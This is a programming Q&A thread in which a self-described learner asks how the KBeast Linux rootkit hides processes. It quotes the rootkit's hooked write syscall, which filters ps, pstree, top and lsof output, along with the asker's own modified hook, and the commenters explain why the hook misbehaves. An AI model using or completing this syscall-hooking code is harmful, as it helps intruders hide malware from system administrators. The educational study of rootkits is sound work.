# How does a rootkit hide a process?

Tags: linux-kernel, operating-system, rootkit

I'm trying to learn how rootkit works (for educational purposes). I have the source code of [Kbeast](http://ipsecs.com/web/?p=277) rootkit. To hide a process from the ps|| pstree etc. command it has the following function,

```
asmlinkage int h4x_write(unsigned int fd, const char __user *buf,size_t count){

   int r;
   char *kbuf=(char*)kmalloc(256,GFP_KERNEL);
   copy_from_user(kbuf,buf,255);
   if ((strstr(current->comm,"ps"))||(strstr(current->comm,"pstree"))||
    (strstr(current->comm,"top"))||(strstr(current->comm,"lsof"))){
        if(strstr(kbuf,_H4X0R_)||strstr(kbuf,KBEAST)){
               kfree(kbuf);
               return -ENOENT;
        }
   }
   r=(*o_write)(fd,buf,count);
   kfree(kbuf);
   return r;
}
```

This function override sys_call_table [__NR_write]. My understanding is *buf, contain the name of the process it is trying to hide. using copy_from_user(), buf is copied into a kernel buffer kbuf and then upon detecting the `ps||pstree||...` command using strstr(), it looks for the process_to_hide(H4X0R). It a match found then, free the kernel buffer kbuf. Is my understanding is correct?

I check the content of **buf**. It contains nothing, therefore it never works.

To make it work, I did a little workaround (not sure if this is the right approach, as I said I'm a beginner). I did the following, to put the process name (the process that I'm trying to hide) into the **buf**, then use **copy_from_user()** to copy it into the kernel space. I've a working code that looks like original Kbeast code,

```
const char *p_name="kbeast";

asmlinkage long test_write(unsigned int fd, char const __user *buf, size_t count){

long r=1;

r = (*original_write)(fd, buf, count);
char *kbuf=(char const *)kmalloc(256,GFP_KERNEL);
//__copy_from_user(kbuf,buf,255);

if (strstr(current->comm,"ps")){
    struct task_struct *task;
        for_each_process(task){
        if (strstr(task->comm,p_name)){
                //printk("%s [%d]\n",task->comm , task->pid);
            buf=task->comm;
            __copy_from_user(kbuf,buf,255);
            break;
        }
    }       
    //printk(KERN_INFO "kBuf %s", kbuf);
    if(strstr(kbuf,p_name)){
            kfree(kbuf);
            return -ENOENT;
        }

}


return r;
}
```

upon running the ps command, it shows the following,

```
 PID TTY          TIME CMD
 10115 pts/2    00:00:00 bash
 14560 pts/2    00:00:00 kbeast
 14561 pts/2    00:00:00 ps
 ps: write error
```

What is happening here?

I was thinking another approach, as in **task_struct** link list contains all the process names, if I can somehow unlink the target process from **task_struct** that should do the trick, but I do not have any idea how to do that.

Comment: Which kernel version are you running?   This is quite an old exploit (2011), and hasn't likely functioned for quite a while.   I think I saw 2.16;  uname -r on my machine shows:4.15.0-74-generic

Comment: @mevets My kernel version is 5.3.0-45-generic. Yes, it is a little bit old, but I thought tweaks it a little bit might work with the current version.

Comment: "I check the content of `buf`. It contains nothing, therefore it never works." - **How** do you check `buf` content? Note, the function `h4x_write` intercepts **every** [write](http://man7.org/linux/man-pages/man2/write.2.html) system call, and generally `buf` is just an array of **bytes** (not symbols, not characters). So even `buf` contains sequence of 10 (value of `count` parameter) zero bytes, this is not "nothing". **When** do you check `buf` content? Note, that `h4x_write` modifies effective behavior of `write` only in the branch ended with `-ENOENT`.

Comment: @perplex  I meant the other way; I think your kernel is too recent; you might need an older one for kbeast.   I cannot find an authoritative statement on that.

Comment: @Tsyvarev, I understand your point. I checked of  `buf` at the beginating of the`test_write` function. And it does contains some byes as you mentioned. But those byte seems random. This brings to my question, Upon executing `ps` command, it will invoke `write` system call, to display all the runninf process, therefore, doesn't it means that, `buf ` will hold all the process name?

Comment: You still don't understand... Your `test_write` function is executed instead of **every** `write` syscall. Yes, original `h4x_write` expects `ps` process to call `write` method with the name of the requested process. But by checking `buf` at the beginning of `test_write` you most likely check the `buf` from the `write` syscall performed by **other process** (not `ps` or related). Or performed by `ps` process but for **other purposes**, when meaning of `buf` is different.